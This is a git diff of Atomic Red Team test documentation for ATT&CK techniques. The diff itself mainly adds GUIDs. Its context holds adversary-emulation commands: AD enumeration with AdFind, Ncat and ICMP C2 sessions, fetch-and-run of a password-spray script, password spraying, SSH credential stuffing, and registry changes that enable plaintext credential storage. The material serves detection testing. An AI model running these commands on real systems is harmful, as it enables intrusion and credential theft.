## Atomic Test #7 - Adfind - Enumerate Active Directory User Objects + +auto_generated_guid: e1ec8d20-509a-4b9a-b820-06c9b2da8eb7 + Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory User Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder\T1087.002\src\AdFind.exe| @@ -270,7 +284,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c ##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{adfind_path}) {exit 0} else {exit 1} +if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -284,16 +298,18 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
## Atomic Test #8 - Adfind - Enumerate Active Directory Exchange AD Objects + +auto_generated_guid: 5e2938fb-f919-47b6-8b29-2f6a1f718e99 + Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Exchange Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder\T1087.002\src\AdFind.exe| @@ -312,7 +328,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c ##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{adfind_path}) {exit 0} else {exit 1} +if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -326,8 +342,10 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
## Atomic Test #9 - Enumerate Default Domain Admin Details (Domain) -This test will enumerate the details of the built-in domain admin account +auto_generated_guid: c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef + +This test will enumerate the details of the built-in domain admin account **Supported Platforms:** Windows @@ -350,18 +368,20 @@ net user administrator /domain
## Atomic Test #10 - Enumerate Active Directory for Unconstrained Delegation + +auto_generated_guid: 46f8dbe9-22a5-4770-8513-66119c5be63b + Attackers may attempt to query for computer objects with the UserAccountControl property 'TRUSTED_FOR_DELEGATION' (0x80000;524288) set More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | domain | Domain FQDN | String | contoso.com| | uac_prop | UAC Property to search | String | 524288| @@ -387,7 +407,7 @@ Try { } Catch { exit 1 -} +} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1090.001/T1090.001.md b/atomics/T1090.001/T1090.001.md index 3559cb9e..ba88f77c 100644 --- a/atomics/T1090.001/T1090.001.md +++ b/atomics/T1090.001/T1090.001.md @@ -16,17 +16,19 @@ By using a compromised internal system as a proxy, adversaries may conceal the t
## Atomic Test #1 - Connection Proxy + +auto_generated_guid: 0ac21132-4485-4212-a681-349e8a6637cd + Enable traffic redirection. Note that this test may conflict with pre-existing system configuration. - **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | proxy_server | Proxy server URL (host:port) | url | 127.0.0.1:8080| | proxy_scheme | Protocol to proxy (http or https) | string | http| @@ -53,18 +55,20 @@ unset https_proxy
## Atomic Test #2 - Connection Proxy for macOS UI + +auto_generated_guid: 648d68c1-8bcd-4486-9abe-71c6655b6a2c + Enable traffic redirection on macOS UI (not terminal). The test will modify and enable the "Web Proxy" and "Secure Web Proxy" settings in System Preferences => Network => Advanced => Proxies for the specified network interface. Note that this test may conflict with pre-existing system configuration. - **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | proxy_server | Proxy server URL (host) | string | 127.0.0.1| | proxy_port | Proxy server port | string | 8080| @@ -93,17 +97,19 @@ networksetup -setsecurewebproxystate #{interface} off
## Atomic Test #3 - portproxy reg key + +auto_generated_guid: b8223ea9-4be2-44a6-b50a-9657a3d4e72a + Adds a registry key to set up a proxy on the endpoint at HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 Upon execution there will be a new proxy entry in netsh netsh interface portproxy show all - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | connectaddress | Specifies the IPv4 address to which to connect. Acceptable values are IP address, computer NetBIOS name, or computer DNS name. If an address is not specified, the default is the local computer. | string | 127.0.0.1| | connectport | Specifies the IPv4 port, by port number or service name, to which to connect. If connectport is not specified, the default is the value of listenport on the local computer. | string | 1337| diff --git a/atomics/T1095/T1095.md b/atomics/T1095/T1095.md index 625bd04f..35f06246 100644 --- a/atomics/T1095/T1095.md +++ b/atomics/T1095/T1095.md @@ -17,16 +17,18 @@ ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Ev
## Atomic Test #1 - ICMP C2 + +auto_generated_guid: 0268e63c-e244-42db-bef7-72a9e59fc1fc + This will attempt to start C2 Session Using ICMP. For information on how to set up the listener refer to the following blog: https://www.blackhillsinfosec.com/how-to-c2-over-icmp/ - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | server_ip | The IP address of the listening server | string | 127.0.0.1| @@ -48,17 +50,19 @@ Invoke-PowerShellIcmp -IPAddress #{server_ip}
## Atomic Test #2 - Netcat C2 + +auto_generated_guid: bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37 + Start C2 Session Using Ncat To start the listener on a Linux device, type the following: nc -l -p - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | server_port | The port for the C2 connection | integer | 80| | ncat_exe | The location of ncat.exe | path | $env:TEMP\T1095\nmap-7.80\ncat.exe| @@ -80,7 +84,7 @@ cmd /c #{ncat_exe} #{server_ip} #{server_port} ##### Description: ncat.exe must be available at specified location (#{ncat_exe}) ##### Check Prereq Commands: ```powershell -if( Test-Path "#{ncat_exe}") {exit 0} else {exit 1} +if( Test-Path "#{ncat_exe}") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -102,17 +106,19 @@ if( $null -eq (Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\
## Atomic Test #3 - Powercat C2 + +auto_generated_guid: 3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e + Start C2 Session Using Powercat To start the listener on a Linux device, type the following: nc -l -p - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | server_ip | The IP address or domain name of the listening server | string | 127.0.0.1| | server_port | The port for the C2 connection | integer | 80| diff --git a/atomics/T1098.004/T1098.004.md b/atomics/T1098.004/T1098.004.md index 10dae2f0..6aefc212 100644 --- a/atomics/T1098.004/T1098.004.md +++ b/atomics/T1098.004/T1098.004.md @@ -12,9 +12,11 @@ Adversaries may modify SSH authorized_keys files directly with scri
## Atomic Test #1 - Modify SSH Authorized Keys + +auto_generated_guid: 342cc723-127c-4d3a-8292-9c0c6b4ecadc + Modify contents of /.ssh/authorized_keys to maintain persistence on victim host. If the user is able to save the same contents in the authorized_keys file, it shows user can modify the file. - **Supported Platforms:** macOS, Linux diff --git a/atomics/T1098/T1098.md b/atomics/T1098/T1098.md index 221f8feb..b4409385 100644 --- a/atomics/T1098/T1098.md +++ b/atomics/T1098/T1098.md @@ -12,8 +12,10 @@
## Atomic Test #1 - Admin Account Manipulate -Manipulate Admin Account Name +auto_generated_guid: 5598f7cb-cf43-455e-883a-f6008c5d46af + +Manipulate Admin Account Name **Supported Platforms:** Windows @@ -62,6 +64,9 @@ foreach($u in $list) {
## Atomic Test #2 - Domain Account and Group Manipulate + +auto_generated_guid: a55a22e9-a3d3-42ce-bd48-2653adb8f7a9 + Create a random atr-nnnnnnnn account and add it to a domain group (by default, Domain Admins). The quickest way to run it is against a domain controller, using `-Session` of `Invoke-AtomicTest`. Alternatively, @@ -74,14 +79,13 @@ service account whose delegation is given onto a dedicated OU for user creation as group manager of the target group. Example: `Invoke-AtomicTest -Session $session 'T1098' -TestNames "Domain Account and Group Manipulate" -InputArgs @{"group" = "DNSAdmins" }` - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | account_prefix | Prefix string of the random username (by default, atr-). Because the cleanup deletes such account based on a match `(&(samaccountname=#{account_prefix}-*)(givenName=Test))`, if you are to change it, be careful. | String | atr-| @@ -121,7 +125,7 @@ Try { } Catch { exit 1 -} +} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1105/T1105.md b/atomics/T1105/T1105.md index 342c71e0..4003a30d 100644 --- a/atomics/T1105/T1105.md +++ b/atomics/T1105/T1105.md @@ -36,15 +36,17 @@
## Atomic Test #1 - rsync remote file copy (push) -Utilize rsync to perform a remote file copy (push) +auto_generated_guid: 0fc6e977-cb12-44f6-b263-2824ba917409 + +Utilize rsync to perform a remote file copy (push) **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_path | Remote path to receive rsync | Path | /tmp/victim-files| | remote_host | Remote host to copy toward | String | victim-host| @@ -68,15 +70,17 @@ rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}
## Atomic Test #2 - rsync remote file copy (pull) -Utilize rsync to perform a remote file copy (pull) +auto_generated_guid: 3180f7d5-52c0-4493-9ea0-e3431a84773f + +Utilize rsync to perform a remote file copy (pull) **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_path | Path of folder to copy | Path | /tmp/adversary-rsync/| | remote_host | Remote host to copy from | String | adversary-host| @@ -100,15 +104,17 @@ rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}
## Atomic Test #3 - scp remote file copy (push) -Utilize scp to perform a remote file copy (push) +auto_generated_guid: 83a49600-222b-4866-80a0-37736ad29344 + +Utilize scp to perform a remote file copy (push) **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_path | Remote path to receive scp | Path | /tmp/victim-files/| | local_file | Path of file to copy | Path | /tmp/adversary-scp| @@ -132,15 +138,17 @@ scp #{local_file} #{username}@#{remote_host}:#{remote_path}
## Atomic Test #4 - scp remote file copy (pull) -Utilize scp to perform a remote file copy (pull) +auto_generated_guid: b9d22b9a-9778-4426-abf0-568ea64e9c33 + +Utilize scp to perform a remote file copy (pull) **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_host | Remote host to copy from | String | adversary-host| | local_path | Local path to receive scp | Path | /tmp/victim-files/| @@ -164,15 +172,17 @@ scp #{username}@#{remote_host}:#{remote_file} #{local_path}
## Atomic Test #5 - sftp remote file copy (push) -Utilize sftp to perform a remote file copy (push) +auto_generated_guid: f564c297-7978-4aa9-b37a-d90477feea4e + +Utilize sftp to perform a remote file copy (push) **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_path | Remote path to receive sftp | Path | /tmp/victim-files/| | local_file | Path of file to copy | Path | /tmp/adversary-sftp| @@ -196,15 +206,17 @@ sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}'
## Atomic Test #6 - sftp remote file copy (pull) -Utilize sftp to perform a remote file copy (pull) +auto_generated_guid: 0139dba1-f391-405e-a4f5-f3989f2c88ef + +Utilize sftp to perform a remote file copy (pull) **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_host | Remote host to copy from | String | adversary-host| | local_path | Local path to receive sftp | Path | /tmp/victim-files/| @@ -228,15 +240,17 @@ sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
## Atomic Test #7 - certutil download (urlcache) -Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works! +auto_generated_guid: dd3b61dd-7bbc-48cd-ab51-49ad1a776df0 + +Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works! **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt| | local_path | Local path to place file | Path | Atomic-license.txt| @@ -262,15 +276,17 @@ del #{local_path} >nul 2>&1
## Atomic Test #8 - certutil download (verifyctl) -Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works! +auto_generated_guid: ffd492e3-0455-4518-9fb1-46527c9f241b + +Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works! **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt| | local_path | Local path to place file | Path | Atomic-license.txt| @@ -300,16 +316,18 @@ Remove-Item "certutil-$(Get-Date -format yyyy_MM_dd)" -Force -Recurse -ErrorActi
## Atomic Test #9 - Windows - BITSAdmin BITS Download + +auto_generated_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b + This test uses BITSAdmin.exe to schedule a BITS job for the download of a file. This technique is used by Qbot malware to download payloads. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | bits_job_name | Name of the created BITS job | String | qcxjb7| | local_path | Local path to place file | Path | %temp%\Atomic-license.txt| @@ -332,16 +350,18 @@ C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{re
## Atomic Test #10 - Windows - PowerShell Download + +auto_generated_guid: 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8 + This test uses PowerShell to download a payload. This technique is used by multiple adversaries and malware families. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt| | destination_path | Destination path to file | Path | $env:TEMP\Atomic-license.txt| @@ -367,15 +387,17 @@ Remove-Item #{destination_path} -Force -ErrorAction Ignore
## Atomic Test #11 - OSTAP Worming Activity -OSTap copies itself in a specfic way to shares and secondary drives. This emulates the activity. +auto_generated_guid: 2ca61766-b456-4fcf-a35a-1233685e1cad + +OSTap copies itself in a specfic way to shares and secondary drives. This emulates the activity. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | destination_path | Path to create remote file at. Default is local admin share. | String | \\localhost\C$| @@ -401,9 +423,11 @@ popd
## Atomic Test #12 - svchost writing a file to a UNC path + +auto_generated_guid: fa5a2759-41d7-4e13-a19c-e8f28a53566f + svchost.exe writing a non-Microsoft Office file to a file with a UNC path. Upon successful execution, this will rename cmd.exe as svchost.exe and move it to `c:\`, then execute svchost.exe with output to a txt file. - **Supported Platforms:** Windows @@ -432,19 +456,21 @@ del C:\\svchost.exe >nul 2>&1
## Atomic Test #13 - Download a File with Windows Defender MpCmdRun.exe + +auto_generated_guid: 815bef8b-bf91-4b67-be4c-abe4c2a94ccc + Uses the Windows Defender to download a file from the internet (must have version 4.18.2007.8-0, 4.18.2007.9, or 4.18.2009.9 installed). The input arguments "remote_file" and "local_path" can be used to specify the download URL and the name of the output file. By default, the test downloads the Atomic Red Team license file to the temp directory. More info and how to find your version can be found here https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/ - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_file | URL of file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt| | local_path | Location to save downloaded file | path | %temp%\Atomic-license.txt| @@ -474,7 +500,7 @@ $retVal = 1 foreach ($version in @("4.18.2007.8-0","4.18.2007.9","4.18.2009.9")){ if (Test-Path "$env:ProgramData\Microsoft\Windows Defender\Platform\$version") { $retVal = 0} } -exit $retVal +exit $retVal ``` ##### Get Prereq Commands: ```powershell @@ -488,15 +514,17 @@ Write-Host "Windows Defender verion 4.18.2007.8-0, 4.18.2007.9, or 4.18.2009.9 m
## Atomic Test #14 - whois file download -Download a remote file using the whois utility +auto_generated_guid: c99a829f-0bb8-4187-b2c6-d47d1df74cab + +Download a remote file using the whois utility **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_host | Remote hostname or IP address | String | localhost| | remote_port | Remote port to connect to | Integer | 8443| @@ -523,7 +551,7 @@ rm -f #{output_file} ##### Description: The whois and timeout commands must be present ##### Check Prereq Commands: ```sh -which whois && which timeout +which whois && which timeout ``` ##### Get Prereq Commands: ```sh diff --git a/atomics/T1106/T1106.md b/atomics/T1106/T1106.md index 6e9899b7..4f7c9b48 100644 --- a/atomics/T1106/T1106.md +++ b/atomics/T1106/T1106.md @@ -16,15 +16,17 @@ Adversaries may abuse these native API functions as a means of executing behavio
## Atomic Test #1 - Execution through API - CreateProcess -Execute program by leveraging Win32 API's. By default, this will launch calc.exe from the command prompt. +auto_generated_guid: 99be2089-c52d-4a4a-b5c3-261ee42c8b62 + +Execute program by leveraging Win32 API's. By default, this will launch calc.exe from the command prompt. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | source_file | Location of the CSharp source file to compile and execute | Path | PathToAtomicsFolder\T1106\src\CreateProcess.cs| | output_file | Location of the payload | Path | %tmp%\T1106.exe| diff --git a/atomics/T1110.001/T1110.001.md b/atomics/T1110.001/T1110.001.md index c92a2e31..c62f01f1 100644 --- a/atomics/T1110.001/T1110.001.md +++ b/atomics/T1110.001/T1110.001.md @@ -33,15 +33,17 @@ In default environments, LDAP and Kerberos connection attempts are less likely t
## Atomic Test #1 - Brute Force Credentials of all domain users via SMB -Creates username and password files then attempts to brute force on remote host +auto_generated_guid: 09480053-2f98-4854-be6e-71ae5f672224 + +Creates username and password files then attempts to brute force on remote host **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_file_users | Path to a file containing a list of users that we will attempt to brute force | Path | DomainUsers.txt| | input_file_passwords | Path to a file containing a list of passwords we will attempt to brute force with | Path | passwords.txt| @@ -69,15 +71,17 @@ echo "Password!" >> #{input_file_passwords}
## Atomic Test #2 - Brute Force Credentials of single domain user via LDAP against domain controller (NTLM or Kerberos) -Attempt to brute force domain user on a domain controller, via LDAP, with NTLM or Kerberos +auto_generated_guid: c2969434-672b-4ec8-8df0-bbb91f40e250 + +Attempt to brute force domain user on a domain controller, via LDAP, with NTLM or Kerberos **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | user | Account to bruteforce | String | bruce.wayne| | passwords | List of passwords we will attempt to brute force with | String | Password1`n1q2w3e4r`nPassword!| diff --git a/atomics/T1110.002/T1110.002.md b/atomics/T1110.002/T1110.002.md index d2184605..7157b87b 100644 --- a/atomics/T1110.002/T1110.002.md +++ b/atomics/T1110.002/T1110.002.md @@ -10,15 +10,17 @@
## Atomic Test #1 - Password Cracking with Hashcat -Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against +auto_generated_guid: 6d27df5d-69d4-4c91-bc33-5983ffe91692 + +Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | hashcat_exe | Path to Hashcat executable | String | %temp%\hashcat6\hashcat-6.1.1\hashcat.exe| | input_file_sam | Path to SAM file | string | PathToAtomicsFolder\T1110.002\src\sam.txt| @@ -47,7 +49,7 @@ del %temp%\hashcat-unzip /Q /S >nul 2>&1 ##### Description: Hashcat must exist on disk at specified location (#{hashcat_exe}) ##### Check Prereq Commands: ```powershell -if (Test-Path $(cmd /c echo #{hashcat_exe})) {exit 0} else {exit 1} +if (Test-Path $(cmd /c echo #{hashcat_exe})) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1110.003/T1110.003.md b/atomics/T1110.003/T1110.003.md index 5b71930e..b5cb5bd3 100644 --- a/atomics/T1110.003/T1110.003.md +++ b/atomics/T1110.003/T1110.003.md @@ -33,18 +33,20 @@ In default environments, LDAP and Kerberos connection attempts are less likely t
## Atomic Test #1 - Password Spray all Domain Users + +auto_generated_guid: 90bc2e54-6c84-47a5-9439-0a2a92b4b175 + CAUTION! Be very careful to not exceed the password lockout threshold for users in the domain by running this test too frequently. This atomic attempts to map the IPC$ share on one of the Domain Controllers using a password of Spring2020 for each user in the %temp%\users.txt list. Any successful authentications will be printed to the screen with a message like "[*] username:password", whereas a failed auth will simply print a period. Use the input arguments to specify your own password to use for the password spray. Use the get_prereq_command's to create a list of all domain users in the temp directory called users.txt. See the "Windows FOR Loop Password Spraying Made Easy" blog by @OrOneEqualsOne for more details on how these spray commands work. https://medium.com/walmartlabs/windows-for-loop-password-spraying-made-easy-c8cd4ebb86b5 - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | password | The password to try for each user in users.txt | string | Spring2020| @@ -63,7 +65,7 @@ See the "Windows FOR Loop Password Spraying Made Easy" blog by @OrOneEqualsOne f ##### Description: List of domain users to password spray must exits at %temp%\users.txt ##### Check Prereq Commands: ```cmd -if not exist %temp%\users.txt (exit /b 1) +if not exist %temp%\users.txt (exit /b 1) ``` ##### Get Prereq Commands: ```cmd @@ -77,17 +79,19 @@ PathToAtomicsFolder\T1110.003\src\parse_net_users.bat
## Atomic Test #2 - Password Spray (DomainPasswordSpray) + +auto_generated_guid: 263ae743-515f-4786-ac7d-41ef3a0d4b2b + Perform a domain password spray using the DomainPasswordSpray tool. It will try a single password against all users in the domain https://github.com/dafthack/DomainPasswordSpray - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | domain | Domain to brute force against | String | (Get-ADDomain | Select-Object -ExpandProperty Name)| @@ -109,17 +113,19 @@ IEX (IWR 'https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb725
## Atomic Test #3 - Password spray all domain users with a single password via LDAP against domain controller (NTLM or Kerberos) + +auto_generated_guid: f14d956a-5b6e-4a93-847f-0c415142f07d + Attempt to brute force all domain user with a single password (called "password spraying") on a domain controller, via LDAP, with NTLM or Kerberos Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user (to fetch the list of all domain users) - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | password | single password we will attempt to auth with (if you need several passwords, then it is a bruteforce so see T1110.001) | String | P@ssw0rd!| | domain | Domain FQDN | String | contoso.com| diff --git a/atomics/T1110.004/T1110.004.md b/atomics/T1110.004/T1110.004.md index 54dcd9de..8f7114b7 100644 --- a/atomics/T1110.004/T1110.004.md +++ b/atomics/T1110.004/T1110.004.md @@ -31,15 +31,17 @@ In addition to management services, adversaries may "target single sign-on (SSO)
## Atomic Test #1 - SSH Credential Stuffing From Linux -Using username,password combination from a password dump to login over SSH. +auto_generated_guid: 4f08197a-2a8a-472d-9589-cd2895ef22ad + +Using username,password combination from a password dump to login over SSH. **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | target_host | IP Address / Hostname you want to target. | String | localhost| @@ -59,7 +61,7 @@ for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepas ##### Description: Requires SSHPASS ##### Check Prereq Commands: ```bash -if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; +if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; ``` ##### Get Prereq Commands: ```bash @@ -73,15 +75,17 @@ if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | g
## Atomic Test #2 - SSH Credential Stuffing From MacOS -Using username,password combination from a password dump to login over SSH. +auto_generated_guid: d546a3d9-0be5-40c7-ad82-5a7d79e1b66b + +Using username,password combination from a password dump to login over SSH. **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | target_host | IP Address / Hostname you want to target. | String | localhost| @@ -101,7 +105,7 @@ for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepas ##### Description: Requires SSHPASS ##### Check Prereq Commands: ```bash -if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; +if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; ``` ##### Get Prereq Commands: ```bash diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md index 186c2deb..119a4d22 100644 --- a/atomics/T1112/T1112.md +++ b/atomics/T1112/T1112.md @@ -26,9 +26,11 @@ The Registry of a remote system may be modified to aid in execution of files as
## Atomic Test #1 - Modify Registry of Current User Profile - cmd + +auto_generated_guid: 1324796b-d0f6-455a-b4ae-21ffee6aa6b9 + Modify the registry of the currently logged in user using reg.exe via cmd console. Upon execution, the message "The operation completed successfully." will be displayed. Additionally, open Registry Editor to view the new entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced. - **Supported Platforms:** Windows @@ -55,17 +57,19 @@ reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
## Atomic Test #2 - Modify Registry of Local Machine - cmd + +auto_generated_guid: 282f929a-6bc5-42b8-bd93-960c3ba35afe + Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup. This should only be possible when CMD is ran as Administrative rights. Upon execution, the message "The operation completed successfully." will be displayed. Additionally, open Registry Editor to view the modified entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Run. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | new_executable | New executable to run on startup instead of Windows Defender | string | calc.exe| @@ -90,10 +94,12 @@ reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v S
## Atomic Test #3 - Modify registry to store logon credentials + +auto_generated_guid: c0413fb5-33e2-40b7-9b6f-60b29f4a7a18 + Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping). Upon execution, the message "The operation completed successfully." will be displayed. Additionally, open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest. - **Supported Platforms:** Windows @@ -120,19 +126,21 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
## Atomic Test #4 - Add domain to Trusted sites Zone + +auto_generated_guid: cf447677-5a4e-4937-a82c-e47d254afd57 + Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over office365. Upon execution, details of the new registry entries will be displayed. Additionally, open Registry Editor to view the modified entry in HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\. https://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterprise-Abusing-Office365-Powershell-For-Covert-C2.pdf - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | bad_domain | Domain to add to trusted site zone | String | bad-domain.com| @@ -163,9 +171,11 @@ Remove-item $key -Recurse -ErrorAction Ignore
## Atomic Test #5 - Javascript in registry + +auto_generated_guid: 15f44ea9-4571-4837-be9e-802431a7bfae + Upon execution, a javascript block will be placed in the registry for persistence. Additionally, open Registry Editor to view the modified entry in HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings. - **Supported Platforms:** Windows @@ -192,16 +202,18 @@ Remove-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Se
